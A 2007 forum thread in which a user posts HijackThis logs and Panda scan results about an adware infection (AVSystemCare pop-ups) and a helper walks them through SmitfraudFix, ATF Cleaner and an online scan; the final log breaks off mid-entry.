http://go.microsoft.com/fwlink/?LinkId=54896R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=566...k/?LinkId=69157R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = O1 - Hosts: 66.38.215.115 kazza.comO1 - Hosts: 66.38.215.115 www.kazza.comO1 - Hosts: 66.38.215.115 kaza.comO1 - Hosts: 66.38.215.115 www.kaza.comO1 - Hosts: 66.38.215.115 kaaza.comO1 - Hosts: 66.38.215.115 www.kaaza.comO1 - Hosts: 66.38.215.115 kahza.comO1 - Hosts: 66.38.215.115 www.kahza.comO1 - Hosts: 66.38.215.115 edonkey.comO1 - Hosts: 66.38.215.115 www.edonkey.comO1 - Hosts: 66.38.215.115 emule.comO1 - Hosts: 66.38.215.115 www.emule.comO1 - Hosts: 66.38.215.115 suprnova.comO1 - Hosts: 66.38.215.115 www.suprnova.comO1 - Hosts: 64.124.166.37 klite.comO1 - Hosts: 64.124.166.37 www.klite.comO1 - Hosts: 64.124.166.37 k-lite.comO1 - Hosts: 64.124.166.37 kazaalite.comO1 - Hosts: 64.124.166.37 www.kazzalite.comO1 - Hosts: 64.124.166.37 kazalite.comO1 - Hosts: 64.124.166.37 www.kazalite.comO1 - Hosts: 64.124.166.37 kaazalite.comO1 - Hosts: 64.124.166.37 www.kaazalite.comO2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dllO2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dllO2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dllO2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar3.dllO2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dllO2 - BHO: CNavExtBho Class - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dllO2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - C:\Program Files\Microsoft Money\System\mnyviewer.dllO3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dllO3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dllO3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar3.dllO4 - HKLM\..\Run: [bCMSMMSG] BCMSMMSG.exeO4 - HKLM\..\Run: [MoneyStartUp10.0] "C:\Program Files\Microsoft Money\System\Activation.exe"O4 - HKLM\..\Run: [AdaptecDirectCD] "C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe"O4 - HKLM\..\Run: [AOLDialer] C:\Program Files\Common Files\AOL\ACS\AOLDial.exeO4 - HKLM\..\Run: [AOL Spyware Protection] "C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\AOLSP Scheduler.exe"O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"O4 - HKLM\..\Run: [symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe /ConsumerO4 - HKLM\..\Run: [HostManager] C:\Program Files\Common Files\AOL\1154100068\ee\AOLSoftware.exeO4 - HKLM\..\Run: [iPHSend] C:\Program Files\Common Files\AOL\IPHSend\IPHSend.exeO4 - HKLM\..\Run: [OM_Monitor] C:\Program Files\OLYMPUS\OLYMPUS Master\FirstStart.exeO4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startupO4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe"O4 - HKLM\..\Run: [cctray] "C:\Program Files\CA\CA Internet Security Suite\cctray\cctray.exe"O4 - HKLM\..\Run: [Windows Defender] "C:\Program Files\Windows Defender\MSASCui.exe" -hideO4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartupO4 - HKCU\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NVMCTRAY.DLL,NvTaskbarInitO4 - HKCU\..\Run: [DellSupport] "C:\Program Files\DellSupport\DSAgnt.exe" /startupO4 - HKCU\..\Run: [OM_Monitor] C:\Program Files\OLYMPUS\OLYMPUS Master\Monitor.exeO4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exeO4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /backgroundO4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exeO4 - HKUS\S-1-5-18\..\RunOnce: [RunNarrator] Narrator.exe (User 'SYSTEM')O4 - HKUS\.DEFAULT\..\RunOnce: [RunNarrator] Narrator.exe (User 'Default user')O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exeO4 - Global Startup: America Online Tray Icon.lnk = C:\Program Files\America Online 9.0\aoltray.exeO4 - Global Startup: Digital Line Detect.lnk = ?O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXEO8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dllO9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dllO9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dllO9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dllO9 - Extra 'Tools' menuitem: Create Mobile Favorite... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dllO9 - Extra button: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)O9 - Extra 'Tools' menuitem: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)O9 - Extra button: AOL Toolbar - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - C:\WINDOWS\System32\shdocvw.dllO9 - Extra 'Tools' menuitem: AOL Toolbar - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - C:\WINDOWS\System32\shdocvw.dllO9 - Extra button: ShopperReports - Compare product prices - {946B3E9E-E21A-49c8-9F63-900533FAFE15} - (no file)O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dllO9 - Extra button: MoneySide - {E023F504-0C5A-4750-A1E7-A9046DEA8A21} - C:\Program Files\Microsoft Money\System\mnyviewer.dllO9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exeO9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exeO16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204O16 - DPF: {44C1E3A2-B594-401C-B27A-D1B4476E4797} (XTSAC Control) - https://mypc.genxsp.net/XTSAC.cabO16 - DPF: {56393399-041A-4650-94C7-13DFCB1F4665} (PSFormX Control) - http://www.my-etrust.com/Support/PestScanner/pestscan.cabO16 - DPF: {6F750200-1362-4815-A476-88533DE61D0C} (Ofoto Upload Manager Class) - http://www.kodakgallery.com/downloads/BUM/..._1/axofupld.cabO16 - DPF: {7584C670-2274-4EFB-B00B-D6AABA6D3850} (Microsoft RDP Client Control (redist)) - https://mypc.genxsp.net/msrdp.cabO16 - DPF: {79D6214F-CFCE-480F-9901-27950E78F1E6} (WebCacheCleaner Class) - https://mypc.genxsp.net/MLWebCacheCleaner.cabO20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLLO22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\System32\browseui.dllO22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\System32\browseui.dllO23 - Service: AOL Connectivity Service (AOL ACS) - America Online - C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exeO23 - Service: AOL Spyware Protection Service (AOLService) - Unknown owner - C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\\aolserv.exeO23 - Service: Automatic LiveUpdate Scheduler - Symantec Corporation - C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exeO23 - Service: C-DillaCdaC11BA - Macrovision - C:\WINDOWS\System32\drivers\CDAC11BA.EXEO23 - Service: CaCCProvSP - Unknown owner - C:\Program Files\CA\CA Internet Security Suite\ccprovsp.exeO23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exeO23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exeO23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exeO23 - Service: DSBrokerService - Unknown owner - C:\Program Files\DellSupport\brkrsvc.exeO23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exeO23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exeO23 - Service: CA Pest Patrol Realtime Protection Service (ITMRTSVC) - CA, Inc. - C:\Program Files\CA\SharedComponents\PPRT\bin\ITMRTSVC.exeO23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXEO23 - Service: Norton AntiVirus Auto-Protect Service (navapsvc) - Symantec Corporation - C:\Program Files\Norton AntiVirus\navapsvc.exeO23 - Service: Intel® NMS (NMSSvc) - Intel Corporation - C:\WINDOWS\System32\NMSSvc.exeO23 - Service: Norton AntiVirus Firewall Monitor Service (NPFMntor) - Symantec Corporation - C:\Program Files\Norton AntiVirus\IWP\NPFMntor.exeO23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exeO23 - Service: PPCtlPriv - CA, Inc. - C:\Program Files\CA\eTrust PestPatrol\PPCtlPriv.exeO23 - Service: SAVScan - Symantec Corporation - C:\Program Files\Norton AntiVirus\SAVScan.exeO23 - Service: ScriptBlocking Service (SBService) - Symantec Corporation - C:\PROGRA~1\COMMON~1\SYMANT~1\SCRIPT~1\SBServ.exeO23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exeO23 - Service: Symantec SPBBCSvc (SPBBCSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exeO23 - Service: Symantec Core LC - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exeO23 - Service: WAN Miniport (ATW) Service (WANMiniportService) - America Online, Inc. - C:\WINDOWS\wanmpsvc.exe--End of file - 13862 bytes Link to post Share on other sites More sharing options...
John Posted June 29, 2007 Author ID:5845 Share Posted June 29, 2007 Still hoping someone can help me out with this damn AVSystemCare issue. Link to post Share on other sites More sharing options...
therock247uk Posted June 29, 2007 ID:5847 Share Posted June 29, 2007 Please download SmitfraudFix (by S!Ri)Extract the content (a folder named SmitfraudFix) to your Desktop.Open the SmitfraudFix folder and double-click smitfraudfix.cmdSelect option #1 - Search by typing 1 and press "Enter"; a text file will appear, which lists infected files (if present).Please copy/paste the content of that report into your next reply.Note : process.exe is detected by some antivirus programs (AntiVir, Dr.Web, Kaspersky) as a "RiskTool"; it is not a virus, but a program used to stop system processes. Antivirus programs cannot distinguish between "good" and "malicious" use of such programs, therefore they may alert the user.http://www.beyondlogic.org/consulting/proc...processutil.htm Link to post Share on other sites More sharing options...
John Posted June 29, 2007 Author ID:5855 Share Posted June 29, 2007 Please download SmitfraudFix (by S!Ri)Extract the content (a folder named SmitfraudFix) to your Desktop.Open the SmitfraudFix folder and double-click smitfraudfix.cmdSelect option #1 - Search by typing 1 and press "Enter"; a text file will appear, which lists infected files (if present).Please copy/paste the content of that report into your next reply.Note : process.exe is detected by some antivirus programs (AntiVir, Dr.Web, Kaspersky) as a "RiskTool"; it is not a virus, but a program used to stop system processes. Antivirus programs cannot distinguish between "good" and "malicious" use of such programs, therefore they may alert the user.http://www.beyondlogic.org/consulting/proc...processutil.htmI ran smitfraudfix.cmd and my Norton AV reported Malicious Script Detected. I authorized the script to run. DOS screen popped up that said "Process.exe file missing! Unzip all the archive in a folder. Press any key to contimue" Link to post Share on other sites More sharing options...
John Posted June 29, 2007 Author ID:5857 Share Posted June 29, 2007 I ran smitfraudfix.cmd and my Norton AV reported Malicious Script Detected. I authorized the script to run. DOS screen popped up that said "Process.exe file missing! Unzip all the archive in a folder. Press any key to contimue"Downloaded smitfraud again and it ran this time. Here are the results. Do I need to run from desktop of every user of my PC?SmitFraudFix v2.197Scan done at 16:20:50.25, Fri 06/29/2007Run from C:\Documents and Settings\Dad\Desktop\SmitfraudFix\SmitfraudFixOS: Microsoft Windows XP [Version 5.1.2600] - Windows_NTThe filesystem type is NTFSFix run in normal mode Link to post Share on other sites More sharing options...
therock247uk Posted July 1, 2007 ID:5893 Share Posted July 1, 2007 Please download ATF Cleaner by Atribune.This program is for XP and Windows 2000 onlyDouble-click ATF-Cleaner.exe to run the program.Under Main choose: Select AllClick the Empty Selected button.If you use Firefox browserClick Firefox at the top and choose: Select AllClick the Empty Selected button.NOTE: If you would like to keep your saved passwords, please click No at the prompt.If you use Opera browserClick Opera at the top and choose: Select AllClick the Empty Selected button.NOTE: If you would like to keep your saved passwords, please click No at the prompt.Click Exit on the Main menu to close the program.For Technical Support, double-click the e-mail address located at the bottom of each menu.Please go HERE to run Panda's ActiveScanOnce you are on the Panda site click the Scan your PC buttonA new window will open...click the Check Now buttonEnter your CountryEnter your State/ProvinceEnter your e-mail address and click sendSelect either Home User or CompanyClick the big Scan Now buttonIf it wants to install an ActiveX component allow itIt will start downloading the files it requires for the scan (Note: It may take a couple of minutes)When download is complete, click on My Computer to start the scanWhen the scan completes, if anything malicious is detected, click the See Report button, then Save Report and save it to a convenient location. Post the contents of the ActiveScan report Link to post Share on other sites More sharing options...
John Posted July 2, 2007 Author ID:5910 Share Posted July 2, 2007 Ran ATF Cleaner and them did a Panda scan with results listed below. The Shutdown.Z virus came from Smitfraud which you previously recommended I instal??Incident Status Location Potentially unwanted tool:application/mywebsearch Not disinfected hkey_current_user\software\MyWebSearch Adware:adware/surfaccuracy Not disinfected Windows Registry Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Dad\Desktop\SmitfraudFix\SmitfraudFix\Process.exe Virus:Trj/Shutdown.Z Disinfected C:\Documents and Settings\Dad\Desktop\SmitfraudFix\SmitfraudFix\restart.exe Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Dad\Desktop\SmitfraudFix.zip[smitfraudFix/Process.exe] Virus:Trj/Shutdown.Z Disinfected C:\Documents and Settings\Dad\Desktop\SmitfraudFix.zip[smitfraudFix/restart.exe] Dialer:Dialer.Gen Not disinfected C:\Program Files\dialware\mission\Gamescape_-_Dialware_-_3.exe Adware:Adware/Comet Not disinfected C:\Program Files\Screensavers.com\Installer\bin\siuninst.exe Spyware:Cookie/Casalemedia Not disinfected C:\Program Files\Yahoo!\YPSR\Quarantine\ppq1B.tmp Spyware:Cookie/QuestionMarket Not disinfected C:\Program Files\Yahoo!\YPSR\Quarantine\ppq1D.tmp Spyware:Cookie/RealMedia Not disinfected C:\Program Files\Yahoo!\YPSR\Quarantine\ppq1E.tmp Spyware:Cookie/Zedo Not disinfected C:\Program Files\Yahoo!\YPSR\Quarantine\ppq21.tmp Spyware:Cookie/Tribalfusion Not disinfected C:\Program Files\Yahoo!\YPSR\Quarantine\ppq5.tmp Spyware:Cookie/RealMedia Not disinfected C:\Program Files\Yahoo!\YPSR\Quarantine\ppq6.tmp Dialer:Dialer.Gen Not disinfected C:\WINDOWS\SYSTEM32\Gamescape - Dialware - 3-uninstall.exe Link to post Share on other sites More sharing options...
therock247uk Posted July 2, 2007 ID:5923 Share Posted July 2, 2007 Thats fine post me a new Hijackthis log and let me know how things are runnig. Link to post Share on other sites More sharing options...
John Posted July 3, 2007 Author ID:5938 Share Posted July 3, 2007 My PC is still very sluggish and I'm still gettig AVSystemCare screen popping up as well as others like Celldorado.com and generousgenie.com (I have pop up blocker on so Idon't understand why this is happening. I'm not getting the sense I've made any progress on my problems?Here's my latest Hijackthis log:Logfile of Trend Micro HijackThis v2.0.0 (BETA)Scan saved at 9:29:24 PM, on 7/2/2007Platform: Windows XP SP2 (WinNT 5.01.2600)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Common Files\Symantec Shared\ccSetMgr.exeC:\Program Files\Common Files\Symantec Shared\SNDSrvc.exeC:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exeC:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exeC:\WINDOWS\system32\spoolsv.exeC:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exeC:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exeC:\PROGRA~1\Grisoft\AVG7\avgamsvr.exeC:\PROGRA~1\Grisoft\AVG7\avgupsvc.exeC:\PROGRA~1\Grisoft\AVG7\avgemc.exeC:\WINDOWS\System32\drivers\CDAC11BA.EXEC:\WINDOWS\System32\cisvc.exeC:\Program Files\CA\SharedComponents\PPRT\bin\ITMRTSVC.exeC:\Program Files\Norton AntiVirus\IWP\NPFMntor.exeC:\WINDOWS\System32\nvsvc32.exeC:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exeC:\WINDOWS\wanmpsvc.exeC:\WINDOWS\Explorer.EXEC:\WINDOWS\BCMSMMSG.exeC:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exeC:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\AOLSP Scheduler.exeC:\Program Files\Common Files\Symantec Shared\ccApp.exeC:\Program Files\Common Files\AOL\1154100068\ee\aolsoftware.exeC:\Program Files\Google\Google Desktop Search\GoogleDesktop.exeC:\Program Files\iTunes\iTunesHelper.exeC:\Program Files\Google\Google Desktop Search\GoogleDesktopIndex.exeC:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exeC:\Program Files\CA\CA Internet Security Suite\cctray\cctray.exeC:\Program Files\iPod\bin\iPodService.exeC:\PROGRA~1\Grisoft\AVG7\avgcc.exeC:\WINDOWS\system32\RUNDLL32.EXEC:\Program Files\DellSupport\DSAgnt.exeC:\Program Files\OLYMPUS\OLYMPUS Master\Monitor.exeC:\Program Files\CA\eTrust PestPatrol\CAPPActiveProtection.exeC:\Program Files\Messenger\msmsgs.exeC:\WINDOWS\system32\ctfmon.exeC:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exeC:\Program Files\Google\Google Desktop Search\GoogleDesktopCrawl.exeC:\Program Files\CA\CA Internet Security Suite\ccprovsp.exeC:\Program Files\Digital Line Detect\DLG.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Norton AntiVirus\navapsvc.exeC:\Documents and Settings\Dad\Desktop\HiJackThis_v2.exeR1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dellnet.com/R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=566...k/?LinkId=69157R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = O1 - Hosts: 66.38.215.115 kazza.comO1 - Hosts: 66.38.215.115 www.kazza.comO1 - Hosts: 66.38.215.115 kaza.comO1 - Hosts: 66.38.215.115 www.kaza.comO1 - Hosts: 66.38.215.115 kaaza.comO1 - Hosts: 66.38.215.115 www.kaaza.comO1 - Hosts: 66.38.215.115 kahza.comO1 - Hosts: 66.38.215.115 www.kahza.comO1 - Hosts: 66.38.215.115 edonkey.comO1 - Hosts: 66.38.215.115 www.edonkey.comO1 - Hosts: 66.38.215.115 emule.comO1 - Hosts: 66.38.215.115 www.emule.comO1 - Hosts: 66.38.215.115 suprnova.comO1 - Hosts: 66.38.215.115 www.suprnova.comO1 - Hosts: 64.124.166.37 klite.comO1 - Hosts: 64.124.166.37 www.klite.comO1 - Hosts: 64.124.166.37 k-lite.comO1 - Hosts: 64.124.166.37 kazaalite.comO1 - Hosts: 64.124.166.37 www.kazzalite.comO1 - Hosts: 64.124.166.37 kazalite.comO1 - Hosts: 64.124.166.37 www.kazalite.comO1 - Hosts: 64.124.166.37 kaazalite.comO1 - Hosts: 64.124.166.37 www.kaazalite.comO2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dllO2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dllO2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dllO2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar3.dllO2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dllO2 - BHO: CNavExtBho Class - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dllO2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - C:\Program Files\Microsoft Money\System\mnyviewer.dllO3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dllO3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dllO3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar3.dllO4 - HKLM\..\Run: [bCMSMMSG] BCMSMMSG.exeO4 - HKLM\..\Run: [MoneyStartUp10.0] "C:\Program Files\Microsoft Money\System\Activation.exe"O4 - HKLM\..\Run: [AdaptecDirectCD] "C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe"O4 - HKLM\..\Run: [AOLDialer] C:\Program Files\Common Files\AOL\ACS\AOLDial.exeO4 - HKLM\..\Run: [AOL Spyware Protection] "C:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\AOLSP Scheduler.exe"O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"O4 - HKLM\..\Run: [symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe /ConsumerO4 - HKLM\..\Run: [HostManager] C:\Program Files\Common Files\AOL\1154100068\ee\AOLSoftware.exeO4 - HKLM\..\Run: [iPHSend] C:\Program Files\Common Files\AOL\IPHSend\IPHSend.exeO4 - HKLM\..\Run: [OM_Monitor] C:\Program Files\OLYMPUS\OLYMPUS Master\FirstStart.exeO4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startupO4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe"O4 - HKLM\..\Run: [cctray] "C:\Program Files\CA\CA Internet Security Suite\cctray\cctray.exe"O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUPO4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartupO4 - HKCU\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NVMCTRAY.DLL,NvTaskbarInitO4 - HKCU\..\Run: [DellSupport] "C:\Program Files\DellSupport\DSAgnt.exe" /startupO4 - HKCU\..\Run: [OM_Monitor] C:\Program Files\OLYMPUS\OLYMPUS Master\Monitor.exeO4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exeO4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /backgroundO4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exeO4 - HKUS\S-1-5-19\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'LOCAL SERVICE')O4 - HKUS\S-1-5-20\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'NETWORK SERVICE')O4 - HKUS\S-1-5-18\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'SYSTEM')O4 - HKUS\S-1-5-18\..\RunOnce: [RunNarrator] Narrator.exe (User 'SYSTEM')O4 - HKUS\.DEFAULT\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'Default user')O4 - HKUS\.DEFAULT\..\RunOnce: [RunNarrator] Narrator.exe (User 'Default user')O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exeO4 - Global Startup: America Online Tray Icon.lnk = C:\Program Files\America Online 9.0\aoltray.exeO4 - Global Startup: Digital Line Detect.lnk = ?O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXEO8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dllO9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dllO9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dllO9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dllO9 - Extra 'Tools' menuitem: Create Mobile Favorite... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dllO9 - Extra button: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)O9 - Extra 'Tools' menuitem: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)O9 - Extra button: AOL Toolbar - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - C:\WINDOWS\System32\shdocvw.dllO9 - Extra 'Tools' menuitem: AOL Toolbar - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - C:\WINDOWS\System32\shdocvw.dllO9 - Extra button: ShopperReports - Compare product prices - {946B3E9E-E21A-49c8-9F63-900533FAFE15} - (no file)O9 - Extra button: Real.com - 